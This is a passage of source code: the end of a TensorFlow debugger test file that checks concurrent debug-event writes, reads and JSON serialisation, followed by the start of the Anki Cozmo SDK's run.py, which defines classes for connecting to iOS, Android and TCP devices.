self.assertEqual(actuals[i].graph_op_creation.op_name, "Conv2D_%d" % i)
self.assertEqual(actuals[num_op_creations].debugged_graph.graph_id,
"deadbeaf")
def testConcurrentWritesToNonExecutionFilesWorks(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
source_file_state = {"counter": 0, "lock": threading.Lock()}
def writer_source_file():
source_file = debug_event_pb2.SourceFile()
with source_file_state["lock"]:
source_file.file_path = "/home/tf2user/file_%d.py" % source_file_state[
"counter"]
source_file_state["counter"] += 1
writer.WriteSourceFile(source_file)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
stack_frame_state = {"counter": 0, "lock": threading.Lock()}
def write_stack_frame():
stack_frame = debug_event_pb2.StackFrameWithId()
with stack_frame_state["lock"]:
stack_frame.id = "stack_frame_%d" % stack_frame_state["counter"]
stack_frame_state["counter"] += 1
writer.WriteStackFrameWithId(stack_frame)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
graph_op_state = {"counter": 0, "lock": threading.Lock()}
def write_graph_op_creation():
graph_op_creation = debug_event_pb2.GraphOpCreation()
with graph_op_state["lock"]:
graph_op_creation.op_name = "Op%d" % graph_op_state["counter"]
graph_op_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
num_threads = 9
threads = []
for i in range(num_threads):
if i % 3 == 0:
target = writer_source_file
elif i % 3 == 1:
target = write_stack_frame
else:
target = write_graph_op_creation
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify the content of the .source_files file.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
actuals = list(item.debug_event.source_file for item in source_files_iter)
file_paths = sorted([actual.file_path for actual in actuals])
self.assertEqual(file_paths, [
"/home/tf2user/file_0.py", "/home/tf2user/file_1.py",
"/home/tf2user/file_2.py"
])
# Verify the content of the .stack_frames file.
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
stack_frame_ids = sorted([actual.id for actual in actuals])
self.assertEqual(stack_frame_ids,
["stack_frame_0", "stack_frame_1", "stack_frame_2"])
# Verify the content of the .graphs file.
actuals = list(item.debug_event.graph_op_creation
for item in reader.graphs_iterator())
graph_op_names = sorted([actual.op_name for actual in actuals])
self.assertEqual(graph_op_names, ["Op0", "Op1", "Op2"])
def testWriteAndReadMetadata(self):
t0 = time.time()
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
writer.Close()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
self.assertIsInstance(reader.starting_wall_time(), float)
self.assertGreaterEqual(reader.starting_wall_time(), t0)
self.assertEqual(reader.tensorflow_version(), versions.__version__)
def testWriteExecutionEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
reader.update()
self.assertFalse(reader.executions())
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
for i, execution in enumerate(executions):
self.assertEqual(
execution.op_type,
"OpType%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteExecutionEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, num_execution_events)
for i, execution in enumerate(executions):
self.assertEqual(execution.op_type, "OpType%d" % i)
def testWriteGraphExecutionTraceEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(reader.graph_execution_traces_iterator())
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
self.assertEqual(len(actuals), 0)
writer.FlushExecutionFiles()
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE)
for i in range(debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE):
self.assertEqual(
actuals[i].op_name,
"Op%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteGraphExecutionTraceEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, num_execution_events)
for i in range(num_execution_events):
self.assertEqual(actuals[i].op_name, "Op%d" % i)
def testConcurrentWritesToExecutionFiles(self):
circular_buffer_size = 5
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
execution_state = {"counter": 0, "lock": threading.Lock()}
def write_execution():
execution = debug_event_pb2.Execution()
with execution_state["lock"]:
execution.op_type = "OpType%d" % execution_state["counter"]
execution_state["counter"] += 1
writer.WriteExecution(execution)
graph_execution_trace_state = {"counter": 0, "lock": threading.Lock()}
def write_graph_execution_trace():
with graph_execution_trace_state["lock"]:
op_name = "Op%d" % graph_execution_trace_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
graph_execution_trace_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
writer.WriteGraphExecutionTrace(trace)
threads = []
for i in range(circular_buffer_size * 4):
if i % 2 == 0:
target = write_execution
else:
target = write_graph_execution_trace
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Verify the content of the .execution file.
executions = reader.executions()
executed_op_types = [execution.op_type for execution in executions]
self.assertLen(executed_op_types, circular_buffer_size)
self.assertLen(executed_op_types, len(set(executed_op_types)))
# Verify the content of the .graph_execution_traces file.
op_names = [trace.op_name for trace in reader.graph_execution_traces()]
self.assertLen(op_names, circular_buffer_size)
self.assertLen(op_names, len(set(op_names)))
def testConcurrentSourceFileRandomReads(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
for i in range(100):
source_file = debug_event_pb2.SourceFile(
host_name="localhost", file_path="/tmp/file_%d.py" % i)
source_file.lines.append("# File %d" % i)
writer.WriteSourceFile(source_file)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
lines = [None] * 100
def read_job_1():
# Read in the reverse order to enhance randomness of the read access.
for i in range(49, -1, -1):
lines[i] = reader.source_lines("localhost", "/tmp/file_%d.py" % i)
def read_job_2():
for i in range(99, 49, -1):
lines[i] = reader.source_lines("localhost", "/tmp/file_%d.py" % i)
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(lines[i], ["# File %d" % i])
def testConcurrentExecutionUpdateAndRandomRead(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
writer_state = {"counter": 0, "done": False}
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
def write_and_update_job():
while True:
if writer_state["done"]:
break
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % writer_state["counter"]
writer_state["counter"] += 1
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
reader.update()
# On the sub-thread, keep writing and reading new Execution protos.
write_and_update_thread = threading.Thread(target=write_and_update_job)
write_and_update_thread.start()
# On the main thread, do concurrent random read.
while True:
exec_digests = reader.executions(digest=True)
if exec_digests:
exec_0 = reader.read_execution(exec_digests[0])
self.assertEqual(exec_0.op_type, "OpType0")
writer_state["done"] = True
break
else:
time.sleep(0.1)
continue
write_and_update_thread.join()
def testConcurrentExecutionRandomReads(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
for i in range(100):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
executions = [None] * 100
def read_job_1():
execution_digests = reader.executions(digest=True)
# Read in the reverse order to enhance randomness of the read access.
for i in range(49, -1, -1):
execution = reader.read_execution(execution_digests[i])
executions[i] = execution
def read_job_2():
execution_digests = reader.executions(digest=True)
for i in range(99, 49, -1):
execution = reader.read_execution(execution_digests[i])
executions[i] = execution
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(executions[i].op_type, "OpType%d" % i)
def testConcurrentGraphExecutionTraceUpdateAndRandomRead(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
writer_state = {"counter": 0, "done": False}
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
def write_and_update_job():
while True:
if writer_state["done"]:
break
op_name = "Op%d" % writer_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
writer.WriteGraphOpCreation(graph_op_creation)
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
writer.WriteGraphExecutionTrace(trace)
writer_state["counter"] += 1
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader.update()
# On the sub-thread, keep writing and reading new GraphExecutionTraces.
write_and_update_thread = threading.Thread(target=write_and_update_job)
write_and_update_thread.start()
# On the main thread, do concurrent random read.
while True:
digests = reader.graph_execution_traces(digest=True)
if digests:
trace_0 = reader.read_graph_execution_trace(digests[0])
self.assertEqual(trace_0.op_name, "Op0")
writer_state["done"] = True
break
else:
time.sleep(0.1)
continue
write_and_update_thread.join()
def testConcurrentGraphExecutionTraceRandomReads(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
for i in range(100):
op_name = "Op%d" % i
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
writer.WriteGraphOpCreation(graph_op_creation)
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
writer.WriteGraphExecutionTrace(trace)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
traces = [None] * 100
def read_job_1():
digests = reader.graph_execution_traces(digest=True)
for i in range(49, -1, -1):
traces[i] = reader.read_graph_execution_trace(digests[i])
def read_job_2():
digests = reader.graph_execution_traces(digest=True)
for i in range(99, 49, -1):
traces[i] = reader.read_graph_execution_trace(digests[i])
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(traces[i].op_name, "Op%d" % i)
class DataObjectsTest(test_util.TensorFlowTestCase):
def jsonRoundTripCheck(self, obj):
self.assertEqual(
json_lib.dumps(json_lib.loads(json_lib.dumps(obj)), sort_keys=True),
json_lib.dumps(obj, sort_keys=True))
def testExecutionDigestWithNoOutputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=None)
json = execution_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], None)
def testExecutionDigestWithTwoOutputsToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357, 2468])
json = execution_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357, 2468))
def testExecutionNoGraphNoInputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357])
execution = debug_events_reader.Execution(
execution_digest,
"localhost",
("a1", "b2"),
debug_event_pb2.TensorDebugMode.CURT_HEALTH,
graph_id=None,
input_tensor_ids=None,
output_tensor_ids=[2468],
debug_tensor_values=([1, 0],))
json = execution.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357,))
self.assertEqual(json["host_name"], "localhost")
self.assertEqual(json["stack_frame_ids"], ("a1", "b2"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH)
self.assertIsNone(json["graph_id"])
self.assertIsNone(json["input_tensor_ids"])
self.assertEqual(json["output_tensor_ids"], (2468,))
self.assertEqual(json["debug_tensor_values"], ([1, 0],))
def testExecutionNoGraphNoInputButWithOutputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357])
execution = debug_events_reader.Execution(
execution_digest,
"localhost",
("a1", "b2"),
debug_event_pb2.TensorDebugMode.FULL_HEALTH,
graph_id="abcd",
input_tensor_ids=[13, 37],
output_tensor_ids=None,
debug_tensor_values=None)
json = execution.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357,))
self.assertEqual(json["host_name"], "localhost")
self.assertEqual(json["stack_frame_ids"], ("a1", "b2"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.FULL_HEALTH)
self.assertEqual(json["graph_id"], "abcd")
self.assertEqual(json["input_tensor_ids"], (13, 37))
self.assertIsNone(json["output_tensor_ids"])
self.assertIsNone(json["debug_tensor_values"])
def testGraphOpCreationDigestNoInputNoDeviceNameToJson(self):
op_creation_digest = debug_events_reader.GraphOpCreationDigest(
1234, 5678, "deadbeef", "FooOp", "Model_1/Foo_2",
[135], input_names=None, device_name=None)
json = op_creation_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_tensor_ids"], (135,))
self.assertIsNone(json["input_names"])
self.assertIsNone(json["device_name"])
def testGraphOpCreationDigestWithInputsAndDeviceNameToJson(self):
op_creation_digest = debug_events_reader.GraphOpCreationDigest(
1234, 5678, "deadbeef", "FooOp", "Model_1/Foo_2",
[135], input_names=["Bar_1", "Qux_2"], device_name="/device:GPU:0")
json = op_creation_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_tensor_ids"], (135,))
self.assertEqual(json["input_names"], ("Bar_1", "Qux_2"))
self.assertEqual(json["device_name"], "/device:GPU:0")
def testGraphExecutionTraceDigestToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
json = trace_digest.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
def testGraphExecutionTraceWithTensorDebugValueAndDeviceNameToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
trace = debug_events_reader.GraphExecutionTrace(
trace_digest, ["g1", "g2", "deadbeef"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH,
debug_tensor_value=[3, 1], device_name="/device:GPU:0")
json = trace.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["graph_ids"], ("g1", "g2", "deadbeef"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH)
self.assertEqual(json["debug_tensor_value"], (3, 1))
self.assertEqual(json["device_name"], "/device:GPU:0")
def testGraphExecutionTraceNoTensorDebugValueNoDeviceNameToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
trace = debug_events_reader.GraphExecutionTrace(
trace_digest, ["g1", "g2", "deadbeef"],
debug_event_pb2.TensorDebugMode.NO_TENSOR,
debug_tensor_value=None, device_name=None)
json = trace.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["graph_ids"], ("g1", "g2", "deadbeef"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.NO_TENSOR)
self.assertIsNone(json["debug_tensor_value"])
self.assertIsNone(json["device_name"])
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
run.py
|
# Copyright (c) 2016-2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''The run module contains helper classes and functions for opening a connection to the engine.
To get started, the :func:`run_program` function can be used for most cases,
it handles connecting to a device and then running the function you provide with
the SDK-provided Robot object passed in.
The :func:`connect` function can be used to open a connection
and run your own code connected to a :class:`cozmo.conn.CozmoConnection`
instance. It takes care of setting up an event loop, finding the Android or
iOS device running the Cozmo app and making sure the connection is ok.
You can also use the :func:`connect_with_tkviewer` or :func:`connect_with_3dviewer`
functions which works in a similar way to :func:`connect`, but will also display
either a a window on the screen showing a view from Cozmo's camera (using Tk), or
a 3d viewer (with optional 2nd window showing Cozmo's camera) (using OpenGL), if
supported on your system.
Finally, more advanced progarms can integrate the SDK with an existing event
loop by using the :func:`connect_on_loop` function.
All of these functions make use of a :class:`DeviceConnector` subclass to
deal with actually connecting to an Android or iOS device. There shouldn't
normally be a need to modify them or write your own.
'''
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['DeviceConnector', 'IOSConnector', 'AndroidConnector', 'TCPConnector',
'connect', 'connect_with_3dviewer', 'connect_with_tkviewer', 'connect_on_loop',
'run_program', 'setup_basic_logging']
import threading
import asyncio
import concurrent.futures
import functools
import inspect
import logging
import os
import os.path
import queue
import shutil
import subprocess
import sys
import types
import warnings
from . import logger, logger_protocol
from . import base
from . import clad_protocol
from . import conn
from . import event
from . import exceptions
from . import usbmux
#: The TCP port number we expect the Cozmo app to be listening on.
COZMO_PORT = 5106
if sys.platform in ('win32', 'cygwin'):
DEFAULT_ADB_CMD = 'adb.exe'
else:
DEFAULT_ADB_CMD = 'adb'
def _observe_connection_lost(proto, cb):
meth = proto.connection_lost
@functools.wraps(meth)
def connection_lost(self, exc):
meth(exc)
cb()
proto.connection_lost = types.MethodType(connection_lost, proto)
class DeviceConnector:
'''Base class for objects that setup the physical connection to a device.'''
def __init__(self, cozmo_port=COZMO_PORT, enable_env_vars=True):
self.cozmo_port = cozmo_port
if enable_env_vars:
self.parse_env_vars()
async def connect(self, loop, protocol_factory, conn_check):
'''Connect attempts to open a connection transport to the Cozmo app on a device.
On opening a transport it will create a protocol from the supplied
factory and connect it to the transport, returning a (transport, protocol)
tuple. See :meth:`asyncio.BaseEventLoop.create_connection`
'''
raise NotImplementedError
def parse_env_vars(self):
try:
self.cozmo_port = int(os.environ['COZMO_PORT'])
except (KeyError, ValueError):
pass
class IOSConnector(DeviceConnector):
'''Connects to an attached iOS device over USB.
Opens a connection to the first iOS device that's found to be running
the Cozmo app in SDK mode.
iTunes (or another service providing usbmuxd) must be installed in order
for this connector to be able to open a connection to a device.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available iOS device running
the Cozmo app in SDK mode.
'''
def __init__(self, serial=None, **kw):
super().__init__(**kw)
self.usbmux = None
self._connected = set()
self.serial = serial
async def connect(self, loop, protocol_factory, conn_check):
if not self.usbmux:
self.usbmux = await usbmux.connect_to_usbmux(loop=loop)
try:
if self.serial is None:
device_info, transport, proto = await self.usbmux.connect_to_first_device(
protocol_factory, self.cozmo_port, exclude=self._connected)
else:
device_id = await self.usbmux.wait_for_serial(self.serial)
device_info, transport, proto = await self.usbmux.connect_to_device(
protocol_factory, device_id, self.cozmo_port)
except asyncio.TimeoutError as exc:
raise exceptions.ConnectionError("No connected iOS devices running Cozmo in SDK mode") from exc
device_id = device_info.get('DeviceID')
proto.device_info={
'device_type': 'ios',
'device_id': device_id,
'serial': device_info.get('SerialNumber')
}
if conn_check is not None:
await conn_check(proto)
self._connected.add(device_id)
logger.info('Connected to iOS device_id=%s serial=%s', device_id,
device_info.get('SerialNumber'))
_observe_connection_lost(proto, functools.partial(self._disconnect, device_id))
return transport, proto
def _disconnect(self, device_id):
logger.info('iOS device_id=%s disconnected.', device_id)
self._connected.discard(device_id)
class AndroidConnector(DeviceConnector):
'''Connects to an attached Android device over USB.
This requires the Android Studio command line tools to be installed,
specifically `adb`.
By default the connector will attempt to locate `adb` (or `adb.exe`
on Windows) in common locations, but it may also be supplied by setting
the ``ANDROID_ADB_PATH`` environment variable, or by passing it
to the constructor.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available Android device running
the Cozmo app in SDK mode.
'''
def __init__(self, adb_cmd=None, serial=None, **kw):
self._adb_cmd = None
super().__init__(**kw)
self.serial = serial
self.portspec = 'tcp:' + str(self.cozmo_port)
self._connected = set()
if adb_cmd:
self._adb_cmd = adb_cmd
else:
self._adb_cmd = shutil.which(DEFAULT_ADB_CMD)
def parse_env_vars(self):
super().parse_env_vars()
self._adb_cmd = os.environ.get('ANDROID_ADB_PATH')
@property
def adb_cmd(self):
if self._adb_cmd is not None:
return self._adb_cmd
if sys.platform != 'win32':
return DEFAULT_ADB_CMD
# C:\Users\IEUser\AppData\Local\Android\android-sdk
# C:\Program Files (x86)\Android\android-sdk
try_paths = []
for path in [os.environ[key] for key in ('LOCALAPPDATA', 'ProgramFiles', 'ProgramFiles(x86)') if key in os.environ]:
try_paths.append(os.path.join(path, 'Android', 'android-sdk'))
for path in try_paths:
adb_path = os.path.join(path, 'platform-tools', 'adb.exe')
if os.path.exists(adb_path):
self._adb_cmd = adb_path
logger.debug('Found adb.exe at %s', adb_path)
return adb_path
raise ValueError('Could not find Android development tools')
def _exec(self, *args):
try:
result = subprocess.run([self.adb_cmd] + list(args),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=5)
except Exception as e:
raise ValueError('Failed to execute adb command %s: %s' % (self.adb_cmd, e))
if result.returncode != 0:
raise ValueError('Failed to execute adb command %s: %s' % (result.args, result.stderr))
return result.stdout.split(b'\n')
def _devices(self):
for line in self._exec('devices'):
line = line.split()
if len(line) != 2 or line[1] != b'device':
continue
yield line[0].decode('ascii') # device serial #
def _add_forward(self, serial):
self._exec('-s', serial, 'forward', self.portspec, self.portspec)
def _remove_forward(self, serial):
self._exec('-s', serial, 'forward', '--remove', self.portspec)
async def connect(self, loop, protocol_factory, conn_check):
version_mismatch = None
for serial in self._devices():
if serial in self._connected:
continue
if self.serial is not None and serial.lower() != self.serial.lower():
continue
logger.debug('Checking connection to Android device: %s', serial)
try:
self._remove_forward(serial)
except:
pass
self._add_forward(serial)
try:
transport, proto = await loop.create_connection(
protocol_factory, '127.0.0.1', self.cozmo_port)
proto.device_info={
'device_type': 'android',
'serial': serial,
}
if conn_check:
# Check that we have a good connection before returning
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info('Connected to Android device serial=%s', serial)
self._connected.add(serial)
_observe_connection_lost(proto, functools.partial(self._disconnect, serial))
return transport, proto
except exceptions.SDKVersionMismatch as e:
version_mismatch = e
except:
pass
self._remove_forward(serial)
if version_mismatch is not None:
raise version_mismatch
raise exceptions.ConnectionError("No connected Android devices running Cozmo in SDK mode")
def _disconnect(self, serial):
logger.info('Android serial=%s disconnected.', serial)
self._connected.discard(serial)
class TCPConnector(DeviceConnector):
'''Connects to the Cozmo app directly via TCP.
Generally only used for testing and debugging.
Requires that a SDK_TCP_PORT environment variable be set to the port
number to connect to.
'''
def __init__(self, tcp_port=None, ip_addr='127.0.0.1', **kw):
super().__init__(**kw)
self.ip_addr = ip_addr
if tcp_port is not None:
# override SDK_TCP_PORT environment variable
self.tcp_port = tcp_port
def parse_env_vars(self):
super().parse_env_vars()
self.tcp_port = None
try:
self.tcp_port = int(os.environ['SDK_TCP_PORT'])
except (KeyError, ValueError):
pass
@property
def enabled(self):
return self.tcp_port is not None
async def connect(self, loop, protocol_factory, conn_check):
transport, proto = await loop.create_connection(protocol_factory, self.ip_addr, self.tcp_port)
proto.device_info={
'device_type': 'tcp',
'host': '%s:%s' % (self.ip_addr, self.tcp_port),
}
if conn_check:
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info("Connected to device on TCP port %d" % self.tcp_port)
return transport, proto
class FirstAvailableConnector(DeviceConnector):
'''Connects to the first Android or iOS device running the Cozmo app in SDK mode.
This class creates an :class:`AndroidConnector` or :class:`IOSConnector`
instance and returns the first successful connection.
This is the default connector used by ``connect_`` functions.
'''
def __init__(self):
super().__init__(self, enable_env_vars=False)
self.tcp = TCPConnector()
self.ios = IOSConnector()
self.android = AndroidConnector()
async def _do_connect(self, connector,loop, protocol_factory, conn_check):
connect = connector.connect(loop, protocol_factory, conn_check)
result = await asyncio.gather(connect, loop=loop, return_exceptions=True)
return result[0]
async def connect(self, loop, protocol_factory, conn_check):
conn_args = (loop, protocol_factory, conn_check)
tcp_result = None
if self.tcp.enabled:
tcp_result = await self._do_connect(self.tcp, *conn_args)
if not isinstance(tcp_result, BaseException):
return tcp_result
logger.warning('No TCP connection found running Cozmo: %s', tcp_result)
android_result = await self._do_connect(self.android, *conn_args)
if not isinstance(android_result, BaseException):
return android_result
ios_result = await self._do_connect(self.ios, *conn_args)
if not isinstance(ios_result, BaseException):
return ios_result
logger.warning('No iOS device found running Cozmo: %s', ios_result)
logger.warning('No Android device found running Cozmo: %s', android_result)
if isinstance(tcp_result, exceptions.SDKVersionMismatch):
raise tcp_result
if isinstance(ios_result, exceptions.SDKVersionMismatch):
raise ios_result
if isinstance(android_result, exceptions.SDKVersionMismatch):
raise android_result
raise exceptions.NoDevicesFound('No devices connected running Cozmo in SDK mode')
# Create an instance of a connector to use by default
# The instance will maintain state about which devices are currently connected.
_DEFAULT_CONNECTOR = FirstAvailableConnector()
def _sync_exception_handler(abort_future, loop, context):
loop.default_exception_handler(context)
exception = context.get('exception')
if exception is not None:
abort_future.set_exception(context['exception'])
else:
abort_future.set_exception(RuntimeError(context['message']))
class _LoopThread:
'''Takes care of managing an event loop running in a dedicated thread.
Args:
loop (:class:`asyncio.BaseEventLoop`): The loop to run
f (callable): Optional code to execute on the loop's thread
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
